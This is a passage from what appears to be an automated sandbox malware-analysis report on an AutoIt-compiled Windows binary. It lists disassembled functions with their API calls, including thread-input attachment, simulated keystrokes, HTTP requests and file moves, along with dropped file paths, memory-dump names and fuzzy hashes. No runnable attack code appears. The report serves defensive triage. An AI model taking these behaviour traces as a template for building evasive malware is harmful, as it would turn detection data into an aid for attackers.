                • SendMessageW.USER32(7692D360,00001001,00000000,?), ref: 00438D6F
                • SendMessageW.USER32(7692D360,00001026,00000000,?), ref: 00438D7E
                  • Part of subcall function 004313B9: CreateSolidBrush.GDI32(?), ref: 00431405
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessageSend$BrushCreateDeleteObjectSolid
                • String ID:
                • API String ID: 3771399671-0
                • Opcode ID: 25a728011c00f04097b8e2539e23f9955433389e4ef5399df42d9a4a499863bb
                • Instruction ID: 2e0a572e4529821e749c28a0f41037d60d8cbdecac9953aa9ba82f262fab4aae
                • Opcode Fuzzy Hash: 25a728011c00f04097b8e2539e23f9955433389e4ef5399df42d9a4a499863bb
                • Instruction Fuzzy Hash: 9351F371300304ABDB20DF65DD86F6AB7A8AB08B24F10551FFA54DB290CBB9E941CB58
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00424608, Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                Download Yara Rule
                APIs
                • GetCurrentThreadId.KERNEL32 ref: 0042462A
                • GetForegroundWindow.USER32(00000000), ref: 0042463C
                • GetWindowThreadProcessId.USER32(00000000), ref: 00424643
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00424658
                • GetWindowThreadProcessId.USER32(?,?), ref: 00424666
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0042467F
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0042468D
                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004246DA
                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004246EE
                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004246F9
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                • String ID:
                • API String ID: 2156557900-0
                • Opcode ID: 922ba51a581951b6c5adfa05936ef5802d8055027087fddc20a0753af83a1c18
                • Instruction ID: 2d5c4b728e4abd82899cadbdfb8a65b12484fc84214180d126d2ada29ed039ea
                • Opcode Fuzzy Hash: 922ba51a581951b6c5adfa05936ef5802d8055027087fddc20a0753af83a1c18
                • Instruction Fuzzy Hash: 03316CB2600215BFDB11DF68ED84A6BB7A9FB95320F42412FF80587210E7B99D408B6C
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F9400, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 324sleepCOMMON
                Download Yara Rule
                APIs
                • InterlockedIncrement.KERNEL32(00497F04), ref: 0041C5DF
                • InterlockedDecrement.KERNEL32(00497F04), ref: 0041C5FD
                • Sleep.KERNEL32(0000000A), ref: 0041C605
                • InterlockedIncrement.KERNEL32(00497F04), ref: 0041C610
                • InterlockedDecrement.KERNEL32(00497F04), ref: 0041C6C2
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Interlocked$DecrementIncrement$Sleep
                • String ID: @COM_EVENTOBJ$DZG
                • API String ID: 327565842-1074702082
                • Opcode ID: e1b7fe0f842e8ad0d82bc11326fca26374d55203a49dba555b769570494085fa
                • Instruction ID: 2f919a56f3f3ed618c35a87ab0f12ff24f8a1a7376fc6651cf3ceedbbfaa8369
                • Opcode Fuzzy Hash: e1b7fe0f842e8ad0d82bc11326fca26374d55203a49dba555b769570494085fa
                • Instruction Fuzzy Hash: 2DD1B071A00209DBDB11EF94C9C5BEEB7B4FF44304F20816AE5156B392D778AD86CB98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00444262, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 271libraryloaderCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AddressProc_free_malloc$_strlen
                • String ID: AU3_FreeVar
                • API String ID: 3358881862-771828931
                • Opcode ID: 28f2280e12e18da6ff0bcfc2b74f26fe9d544a05a6ae3dd197d34f202110145f
                • Instruction ID: 2308f961f62e884b609e3206f1a8f20425cf13c7c1e877a9a11b2eeccd234717
                • Opcode Fuzzy Hash: 28f2280e12e18da6ff0bcfc2b74f26fe9d544a05a6ae3dd197d34f202110145f
                • Instruction Fuzzy Hash: A8B1AFB4A00206DFDB00DF64C885A6AB7B5FF88314F2485AEE9158F362D739ED51CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044FB23, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 147windowCOMMON
                Download Yara Rule
                APIs
                • _memset.LIBCMT ref: 0044FB72
                • GetMenuItemInfoW.USER32 ref: 0044FBBF
                • IsMenu.USER32 ref: 0044FBD6
                • CreatePopupMenu.USER32(00000000,?,769133D0), ref: 0044FC0E
                • GetMenuItemCount.USER32 ref: 0044FC74
                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044FC9D
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                • String ID: 0$2
                • API String ID: 3311875123-3793063076
                • Opcode ID: 20dab057f09a79228e43ad13d7f574ec0b7acee33be8fe90f5e0bef56a9a67a8
                • Instruction ID: f055716a5e8b495d54557d9d6669e67bf99c130155b06911fe73846a66ef716f
                • Opcode Fuzzy Hash: 20dab057f09a79228e43ad13d7f574ec0b7acee33be8fe90f5e0bef56a9a67a8
                • Instruction Fuzzy Hash: D551A5719002099BEB20CF69D9C8BAFB7E4FF45314F14852EE825D7381D3789849CBA9
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043C753, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 88COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: __wcsnicmp
                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin$DZG
                • API String ID: 1038674560-2411836789
                • Opcode ID: 387e1ed653f7cae8f8957bfbf67991552ef77c450f06cacfce457aeb5f98ce27
                • Instruction ID: bff3eb5a5cc57bc735758c777d44ee8112a4ef71d3f635cdb7e1a166324e142a
                • Opcode Fuzzy Hash: 387e1ed653f7cae8f8957bfbf67991552ef77c450f06cacfce457aeb5f98ce27
                • Instruction Fuzzy Hash: AC21FB3765061066E321B619AC82FDB739C9F69314F04803BFD05AF342D6BAB95583EA
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0042401B, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNEL32(00000000,004990E8,?,00000100,?,C:\Users\user\31956653\thjfdg.xcp), ref: 0042403E
                • LoadStringW.USER32(00000000), ref: 00424047
                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0042405C
                • LoadStringW.USER32(00000000), ref: 0042405F
                • _wprintf.LIBCMT ref: 00424088
                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004240A0
                Strings
                • C:\Users\user\31956653\thjfdg.xcp, xrefs: 00424027
                • %s (%d) : ==> %s: %s %s, xrefs: 00424083
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: HandleLoadModuleString$Message_wprintf
                • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\31956653\thjfdg.xcp
                • API String ID: 3648134473-926813165
                • Opcode ID: fc1c3909feaf3a7590b74f5572e2feb899c0bf9e2019541680f44b101fcf66a8
                • Instruction ID: c70ff8e0c951a97c899fde2bd7cb9bd3fca3030e898b9d8022c95365fe19f75f
                • Opcode Fuzzy Hash: fc1c3909feaf3a7590b74f5572e2feb899c0bf9e2019541680f44b101fcf66a8
                • Instruction Fuzzy Hash: 19016CB1A503187AE710E7959D06FF6372CD7C4B11F00819AB74CAA0C0DAF46D848BB5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00446151, Relevance: 13.7, APIs: 9, Instructions: 164COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6d9887481421f422c9c6ce5de19f3f577a776c342c9fc89d0677d0113ff7a30b
                • Instruction ID: 46624d0c3e44dcbe7270caf43bc6f9d102ac42eed498c5ae0deff036fcb033da
                • Opcode Fuzzy Hash: 6d9887481421f422c9c6ce5de19f3f577a776c342c9fc89d0677d0113ff7a30b
                • Instruction Fuzzy Hash: AE517E70700305ABEB20DF69DC81F9B77A8BB49714F10462AFA09DB3D0D7B5E8508B59
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00443808, Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 003FF220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\31956653\thjfdg.xcp,003FF1F5,C:\Users\user\31956653\thjfdg.xcp,004990E8,C:\Users\user\31956653\thjfdg.xcp,?,003FF1F5,?,?,00000001), ref: 003FF23C
                  • Part of subcall function 0042397D: GetFileAttributesW.KERNELBASE(?), ref: 00423984
                • lstrcmpiW.KERNEL32(?,?), ref: 00443875
                • MoveFileW.KERNEL32(?,?), ref: 004438A7
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: File$AttributesFullMoveNamePathlstrcmpi
                • String ID:
                • API String ID: 978794511-0
                • Opcode ID: 2de33d1237a7e95031a8cb606d44b515c2be6b3ce74f2b96d1309ee97604478e
                • Instruction ID: c15988e2ef54758bdf730a563e168d5f2cbba40f5bb91c0c378cbac495dd565c
                • Opcode Fuzzy Hash: 2de33d1237a7e95031a8cb606d44b515c2be6b3ce74f2b96d1309ee97604478e
                • Instruction Fuzzy Hash: 645175B2C0021956DF20EFA1DC81AEEB378AF44305F4445EEEA0D63141EB79AB98CB55
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004310EC, Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 62b3823eaecbb5cfb24ebc570ead74d63c209e274ff410fc69bc5a6166b02a31
                • Instruction ID: 5de6130bc735fcbca8ffbfa62425dd67304bd00a0ec28e3f653afddffc4f9522
                • Opcode Fuzzy Hash: 62b3823eaecbb5cfb24ebc570ead74d63c209e274ff410fc69bc5a6166b02a31
                • Instruction Fuzzy Hash: 2C4129322142405AE721972CBCC4BEBBB98FBAA324F10002FF186C55A0C3EA78D58724
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00435D58, Relevance: 13.6, APIs: 9, Instructions: 69sleepkeyboardwindowCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004359AD: GetWindowThreadProcessId.USER32(?,00000000), ref: 004359CD
                  • Part of subcall function 004359AD: GetCurrentThreadId.KERNEL32 ref: 004359D4
                  • Part of subcall function 004359AD: AttachThreadInput.USER32(00000000), ref: 004359DB
                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00435D75
                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00435D8E
                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00435D9C
                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00435DA2
                • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00435DC3
                • Sleep.KERNEL32(00000000), ref: 00435DD1
                • MapVirtualKeyW.USER32(00000025,00000000), ref: 00435DD7
                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00435DEC
                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00435DF4
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                • String ID:
                • API String ID: 2014098862-0
                • Opcode ID: 754739ecac2fb81825c0074fff0dd4066062958f135ec3837b213c9ab854dbd4
                • Instruction ID: 7e2553398443468eb30516c1161d4c25d317e0c3894164419ecc416f6ae6ebec
                • Opcode Fuzzy Hash: 754739ecac2fb81825c0074fff0dd4066062958f135ec3837b213c9ab854dbd4
                • Instruction Fuzzy Hash: 80115671390300BBF6209B969C8AF55776DEB9CB11F20450AF784AB1C0C5F5A481CA7D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004226D5, Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ClearVariant
                • String ID:
                • API String ID: 1473721057-0
                • Opcode ID: f92309c51ea74aff0a6ea3067323b139965281e2e84643b19b6f3c5012fa40c4
                • Instruction ID: d7afa8818732a26d3d81070b809cb96da850ff67f33c13ee545635f24eb735cd
                • Opcode Fuzzy Hash: f92309c51ea74aff0a6ea3067323b139965281e2e84643b19b6f3c5012fa40c4
                • Instruction Fuzzy Hash: E0014FB70007086AC230E7B9EC40FD7B7EC9F94200F018E1DE58A83114DA74F188CB54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0044E9FC, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                Download Yara Rule
                APIs
                • VariantInit.OLEAUT32(00000000), ref: 0044EA43
                • VariantCopy.OLEAUT32(00000000), ref: 0044EA4D
                • VariantClear.OLEAUT32 ref: 0044EA5A
                • VariantTimeToSystemTime.OLEAUT32 ref: 0044EBF3
                • __swprintf.LIBCMT ref: 0044EC20
                • VariantInit.OLEAUT32(00000000), ref: 0044ECDB
                Strings
                • %4d%02d%02d%02d%02d%02d, xrefs: 0044EC1A
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Variant$InitTime$ClearCopySystem__swprintf
                • String ID: %4d%02d%02d%02d%02d%02d
                • API String ID: 2441338619-1568723262
                • Opcode ID: eca9711be4d560b3ea53ab498545d63b4547aeaa8b5c40958cff6e37631ffc0f
                • Instruction ID: 554a161bc682c3011feadfdd371ce67b85c4515f3e215d84bb64441b4a074ae7
                • Opcode Fuzzy Hash: eca9711be4d560b3ea53ab498545d63b4547aeaa8b5c40958cff6e37631ffc0f
                • Instruction Fuzzy Hash: DAA1E576A0052487D7209F5AE4C06AAF7B4FF44321F1489AFED89AB310C736AC95D7E1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0045B9C2, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 308COMMON
                Download Yara Rule
                APIs
                • _memset.LIBCMT ref: 0045BA14
                • VariantInit.OLEAUT32(?), ref: 0045BAE4
                  • Part of subcall function 00441AB8: GetLastError.KERNEL32(?,?,00000000), ref: 00441B16
                  • Part of subcall function 00441AB8: VariantCopy.OLEAUT32(?,?), ref: 00441B6E
                  • Part of subcall function 00441AB8: VariantCopy.OLEAUT32(-00000068,?), ref: 00441B84
                  • Part of subcall function 00441AB8: VariantCopy.OLEAUT32(-00000088,?), ref: 00441B9D
                  • Part of subcall function 00441AB8: VariantClear.OLEAUT32(-00000058), ref: 00441C17
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Variant$Copy$ClearErrorInitLast_memset
                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                • API String ID: 530611519-625585964
                • Opcode ID: e27d085c09d4788f852557f1c9e7a146c17406251f76eba04dc0b7cc13ed164d
                • Instruction ID: 3fe877dddba44e2e6546111d1ea4cfef39441c6b2f479d19bb6304b01df178c8
                • Opcode Fuzzy Hash: e27d085c09d4788f852557f1c9e7a146c17406251f76eba04dc0b7cc13ed164d
                • Instruction Fuzzy Hash: 33A1D872A40209ABDB10DF94DCC1EEEB3B9FF84315F10852EFA04AB281D7B59D4587A5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043A9CA, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                Download Yara Rule
                APIs
                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0043AA09
                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0043AA3E
                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0043AAA2
                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0043AAB8
                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0043AAC7
                • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0043AAFF
                  • Part of subcall function 00432252: GetLastError.KERNEL32 ref: 00432268
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                • String ID:
                • API String ID: 1291720006-3916222277
                • Opcode ID: 0660c0a1a8d017dc4a8b882983a3c6b7f589eb9c57e5668531e5019c47895fae
                • Instruction ID: 935deb9ebf1375b1c81a92b373e68e92285200a6943c2d2e25d490a6bc087b1b
                • Opcode Fuzzy Hash: 0660c0a1a8d017dc4a8b882983a3c6b7f589eb9c57e5668531e5019c47895fae
                • Instruction Fuzzy Hash: 4B5112756403087BE710EF55DD86FEBB7ACEB88710F00851AFA4597281D7B8A5188BA8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004252D0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                Download Yara Rule
                APIs
                • SafeArrayAccessData.OLEAUT32(?,?), ref: 004252F4
                • VariantClear.OLEAUT32(?), ref: 0042532E
                • SafeArrayUnaccessData.OLEAUT32(?), ref: 0042534E
                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00425381
                • VariantClear.OLEAUT32(?), ref: 004253C1
                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00425404
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.359435304.00000000003F1000.00000020.00020000.sdmp, Offset: 003F0000, based on PE: true
                • Associated: 00000004.00000002.359423855.00000000003F0000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359729741.0000000000472000.00000002.00020000.sdmp Download File
                • Associated: 00000004.00000002.359755606.0000000000480000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359766285.0000000000481000.00000008.00020000.sdmp Download File
                • Associated: 00000004.00000002.359783540.0000000000482000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359804187.0000000000497000.00000004.00020000.sdmp Download File
                • Associated: 00000004.00000002.359828729.000000000049B000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                • String ID: crts
                • API String ID: 586820018-3724388283
                • Opcode ID: 3f887ff433a9c9a4112c93fdd239c0d336adb40bff416a4fe83e7f6c6ef411c8
                • Instruction ID: 2e9e5191f9f8dae5ebbe6524aefde1f0fe203785b6d671e8ff9d55f9b6b5d5d7
                • Opcode Fuzzy Hash: 3f887ff433a9c9a4112c93fdd239c0d336adb40bff416a4fe83e7f6c6ef411c8
                • Instruction Fuzzy Hash: 5441A0B5200208DBDB20CF18E884A9AB7B5FF9C314F24C12AEE49CB355D775E951CB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0043BB5E, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 003FF220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\31956653\thjfdg.xcp,003FF1F5,C:\Users\user\31956653\thjfdg.xcp,004990E8,C:\Users\user\31956653\thjfdg.xcp,?,003FF1F5,?,?,00000001), ref: 003FF23C
                • lstrcmpiW.KERNEL32(?,?), ref: 0043BB95
                • MoveFileW.KERNEL32(?,?), ref: 0043BBCB
                • _wcscat.LIBCMT ref: 0043BC3B
                • _wcslen.LIBCMT ref: 0043BC47
                • _wcslen.LIBCMT ref: 0043BC5D
                • SHFileOperationW.SHELL32(?), ref: 0043BCA3
                Strings
                Memory Dump Source
